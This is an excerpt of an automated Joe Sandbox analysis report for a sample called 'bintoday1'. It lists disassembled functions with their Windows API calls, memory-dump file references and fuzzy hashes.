Instruction Fuzzy Hash: D0418D346052259FCB22CF59E8D4FAD77F4BB48B14F1842A8E8249B661C770AA41DF90

Function 00C216DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00C216EB

Part of subcall function 00BF3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BF3A57
Part of subcall function 00BF3A3D: GetCurrentThreadId.KERNEL32 ref: 00BF3A5E
Part of subcall function 00BF3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00BF25B3), ref: 00BF3A65

GetCaretPos.USER32(?), ref: 00C216FF
ClientToScreen.USER32(00000000,?), ref: 00C2174C
GetForegroundWindow.USER32 ref: 00C21752

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: e7cfb55d237e615f9fd7b05f1f5ade9b61511e8167964f0bcca97701df8ef444
Instruction ID: 5c55676110ad08bd56ecd1d4a29e4247f4137099f3e72b10342aad9935962f22
Opcode Fuzzy Hash: e7cfb55d237e615f9fd7b05f1f5ade9b61511e8167964f0bcca97701df8ef444
Instruction Fuzzy Hash: 83315475D00149AFCB10DFAAC8C1DAEBBF9EF48304B5480A9E415E7611E731DE45CBA0

Function 00BFD4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00BFD501
Process32FirstW.KERNEL32(00000000,?), ref: 00BFD50F
Process32NextW.KERNEL32(00000000,?), ref: 00BFD52F
CloseHandle.KERNEL32(00000000), ref: 00BFD5DC

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 8d35b2b4351065044dcfa012dee39db958945324aff02c175383e1247e2df447
Instruction ID: bf7869d6de85c23b12a891924f6bfc37df1ea38a56fc453ebbe48da6ca209b43
Opcode Fuzzy Hash: 8d35b2b4351065044dcfa012dee39db958945324aff02c175383e1247e2df447
Instruction Fuzzy Hash: 6231AD310083049FD710EF64C881BBFBBE8EF99354F10096DF581831A1EB719949CBA2

Function 00C28FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

GetCursorPos.USER32(?), ref: 00C29001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BE7711,?,?,?,?,?), ref: 00C29016
GetCursorPos.USER32(?), ref: 00C2905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BE7711,?,?,?), ref: 00C29094

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: b2b967525c3c67944d639577177c2831193602de57b71052be0336271eda5ad8
Instruction ID: 070857a8237e0ccab6728f81046b50480f804db72a40a854aea555cc51ecd278
Opcode Fuzzy Hash: b2b967525c3c67944d639577177c2831193602de57b71052be0336271eda5ad8
Instruction Fuzzy Hash: 3B21BF31600028EFCB258F95D898FFE3BB9FF89360F044165F91587661C7319A50EB60

Function 00BFD2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C2CB68), ref: 00BFD2FB
GetLastError.KERNEL32 ref: 00BFD30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00BFD319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C2CB68), ref: 00BFD376

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: d70eb67cb1961374943691b40f9b77b26ca750d8a7bfce87b7e4efc485273177
Instruction ID: 42c4af0dafeedc79db95f2ae525a605496bdfb8a5baea9702b5e989099d5a367
Opcode Fuzzy Hash: d70eb67cb1961374943691b40f9b77b26ca750d8a7bfce87b7e4efc485273177
Instruction Fuzzy Hash: 9D21D1705082059F8710DF28C88197E77E5EE5A364F104AADF699C32A1DB30D90ACB97

Function 00BF1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BF102A
Part of subcall function 00BF1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BF1036
Part of subcall function 00BF1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF1045
Part of subcall function 00BF1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF104C
Part of subcall function 00BF1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BF1062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BF15BE
_memcmp.LIBVCRUNTIME ref: 00BF15E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BF1617
HeapFree.KERNEL32(00000000), ref: 00BF161E

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 025190ad1e9aa9a3ec5b18e89399e72081642779b2bd0a110def9e17b6500cb6
Instruction ID: d83a8b1e704f727af26c9983290790ff63cdd07c5553e5c584828daa957753b6
Opcode Fuzzy Hash: 025190ad1e9aa9a3ec5b18e89399e72081642779b2bd0a110def9e17b6500cb6
Instruction Fuzzy Hash: CE215731E00108EBDB10DFA8C945BFEB7F8EF54344F084899E541AB241E731AA09CBA0

Function 00C22782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00C2280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C22824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00C22832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00C22840

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 9b2d4710b7493cda77f1bf1b26f98ac44a7eb464e4f49824ef0691969b4a9fd8
Instruction ID: 7b580f1041428e9b76bd12bf71fcdc600f29b64fae76e23e5a9989ddb1ade0ce
Opcode Fuzzy Hash: 9b2d4710b7493cda77f1bf1b26f98ac44a7eb464e4f49824ef0691969b4a9fd8
Instruction Fuzzy Hash: 1621D335208121BFD7249B24DC84FAA7B95EF45324F148258F4268BAE2CB75FD82CB90

Function 00BF78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00BF790A,?,000000FF,?,00BF8754,00000000,?,0000001C,?,?), ref: 00BF8D8C
Part of subcall function 00BF8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00BF8DB2
Part of subcall function 00BF8D7D: lstrcmpiW.KERNEL32(00000000,?,00BF790A,?,000000FF,?,00BF8754,00000000,?,0000001C,?,?), ref: 00BF8DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00BF8754,00000000,?,0000001C,?,?,00000000), ref: 00BF7923
lstrcpyW.KERNEL32(00000000,?), ref: 00BF7949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00BF8754,00000000,?,0000001C,?,?,00000000), ref: 00BF7984

Strings

cdecl, xrefs: 00BF797B

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 2b63a4389ea8ef74d587c53b8f5e857699a5bd18ab6e10b34d794f9eced12041
Instruction ID: ab4e1d951d4b9eb9c009f472006b5134e514ce9aa2c35f350f22b0bff04e18da
Opcode Fuzzy Hash: 2b63a4389ea8ef74d587c53b8f5e857699a5bd18ab6e10b34d794f9eced12041
Instruction Fuzzy Hash: 0211033A200206BBDB259F34CC45E7E77E9FF95350B4080AAFA02C72A4EF719815C7A1

Function 00C27CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00C27D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00C27D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00C27D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C0B7AD,00000000), ref: 00C27D6B

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 46bd4bfa5b22e35a6d5f2fecca9d6cccdf2e8ca2b52896285bc8a6aaff9d11da
Instruction ID: 88cb5d5b5c1e40bb104dec26143ca0ebfe2b784830b161148f69d874f6ee1a11
Opcode Fuzzy Hash: 46bd4bfa5b22e35a6d5f2fecca9d6cccdf2e8ca2b52896285bc8a6aaff9d11da
Instruction Fuzzy Hash: 0411DF31214625AFCB208F29EC84BAA3BA5AF45370F294724FC39C76F0D7309A11DB50

Function 00C25660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00C256BB
_wcslen.LIBCMT ref: 00C256CD
_wcslen.LIBCMT ref: 00C256D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00C25816

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 35450aefe4fbd968376f0bef4c900463fbc65c36b0142a0619bb0b3009584549
Instruction ID: b95fca6c36e301dd958870a2a27a70388b8fc15f8d85943f07a4b967dc232b69
Opcode Fuzzy Hash: 35450aefe4fbd968376f0bef4c900463fbc65c36b0142a0619bb0b3009584549
Instruction Fuzzy Hash: 3C11D3716006289ADF20EF66EC85BFF77ACEF10760B504066F925D6581E7B0CA80CB64

Function 00BC1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6ecd68774f44dcf3f2839b540ec466895aa247f829a7794f688a2a2d36d92c
Instruction ID: 1adb16a0a71406f63db34150a7fc75d557d0b003396830f98cf22e7a698cff83
Opcode Fuzzy Hash: dc6ecd68774f44dcf3f2839b540ec466895aa247f829a7794f688a2a2d36d92c
Instruction Fuzzy Hash: 9B012CB2205A167EF621167C6CC1F6B669DDF423B8B3507BDF532611D6DB708C5051B0

Function 00BF1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00BF1A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BF1A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BF1A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BF1A8A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: fbae3920d7537b2684180f632b19728b0dfd54a4bb3c8c257d0f659b37ed19d2
Instruction ID: 9ceb8fae89df4f0cff6bc5f06d2f32659bfb3c2df21297e755142070fdc040f9
Opcode Fuzzy Hash: fbae3920d7537b2684180f632b19728b0dfd54a4bb3c8c257d0f659b37ed19d2
Instruction Fuzzy Hash: 4E11393AD01219FFEB10DFA9CD85FADBBB8EB08750F200491EA10B7290D6716E50DB94

Function 00BFE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00BFE1FD
MessageBoxW.USER32(?,?,?,?), ref: 00BFE230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BFE246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BFE24D

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 4eb76c80bde85f0a219f57173fe3c3f8f313ac7f198739a8b0651269729f79f0
Instruction ID: f89fb722459058045167ad635ad287bc112d37e8b50080059acd23c08f04a7db
Opcode Fuzzy Hash: 4eb76c80bde85f0a219f57173fe3c3f8f313ac7f198739a8b0651269729f79f0
Instruction Fuzzy Hash: 74110872904258BBD7119BA9DC45BBE7FECEB45321F184665F925D33A0E6B0C90487A0

Function 00BBD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00BBCFF9,00000000,00000004,00000000), ref: 00BBD218
GetLastError.KERNEL32 ref: 00BBD224
__dosmaperr.LIBCMT ref: 00BBD22B
ResumeThread.KERNEL32(00000000), ref: 00BBD249

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 33305cd9056e9859503658d79dc11d15f3a349aee2929b7dd18cd364e9d5e3c7
Instruction ID: 9e32554524b0241fcfeb6409a66c03617625da72d9012c0f4bc2f5997eeac38f
Opcode Fuzzy Hash: 33305cd9056e9859503658d79dc11d15f3a349aee2929b7dd18cd364e9d5e3c7
Instruction Fuzzy Hash: AB01D6364052057BCB215BA5DC45BFE7AE9DF81330F100299F925921E0EBB58901C7A0

Function 00C29EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00BA9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BA9BB2

GetClientRect.USER32(?,?), ref: 00C29F31
GetCursorPos.USER32(?), ref: 00C29F3B
ScreenToClient.USER32(?,?), ref: 00C29F46
DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00C29F7A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: b8add116e7b85ae823282f7f7d73080c2a95073148f42ac584df1ea93aef7911
Instruction ID: 0b28d71ac28376b0d3f05d04d396f9848e9975fdf0b4cc99100f02f62b25c8a0
Opcode Fuzzy Hash: b8add116e7b85ae823282f7f7d73080c2a95073148f42ac584df1ea93aef7911
Instruction Fuzzy Hash: 10115E3190012AABDB60DF98E985AEE77B8FF05311F000451F921E3950D734BB92DBA1

Function 00B9600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B9604C
GetStockObject.GDI32(00000011), ref: 00B96060
SendMessageW.USER32(00000000,00000030,00000000), ref: 00B9606A

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 5f67a6c09e6f377080c4bea8a0681a0349bd81117a28c99a1d2a681d4f3958a8
Instruction ID: 0bc174717c794602be2f267b11eab5de0d211994264c96b6f04ee094f13870c2
Opcode Fuzzy Hash: 5f67a6c09e6f377080c4bea8a0681a0349bd81117a28c99a1d2a681d4f3958a8
Instruction Fuzzy Hash: 2E116172501508BFEF264F949CD4FEEBBA9EF18794F040155FA1452120D7329C60DB90

Function 00BB3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00BB3B56

Part of subcall function 00BB3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00BB3AD2
Part of subcall function 00BB3AA3: ___AdjustPointer.LIBCMT ref: 00BB3AED

_UnwindNestedFrames.LIBCMT ref: 00BB3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00BB3B7C
CallCatchBlock.LIBVCRUNTIME ref: 00BB3BA4

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 00af5686bcfaf775c2a3ce53718c40c7171a09d2adea251486a865479ac2f2d0
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: E6012932100148BBDF126E95CC42EFB7BE9FF48B54F044094FE4856121C772E961EBA0

Function 00BC3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B913C6,00000000,00000000,?,00BC301A,00B913C6,00000000,00000000,00000000,?,00BC328B,00000006,FlsSetValue), ref: 00BC30A5
GetLastError.KERNEL32(?,00BC301A,00B913C6,00000000,00000000,00000000,?,00BC328B,00000006,FlsSetValue,00C32290,FlsSetValue,00000000,00000364,?,00BC2E46), ref: 00BC30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00BC301A,00B913C6,00000000,00000000,00000000,?,00BC328B,00000006,FlsSetValue,00C32290,FlsSetValue,00000000), ref: 00BC30BF

Memory Dump Source

Source File: 00000000.00000002.2189025274.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2189005511.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C2C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189090461.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189135948.0000000000C5C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189153771.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_bintoday1.jbxd

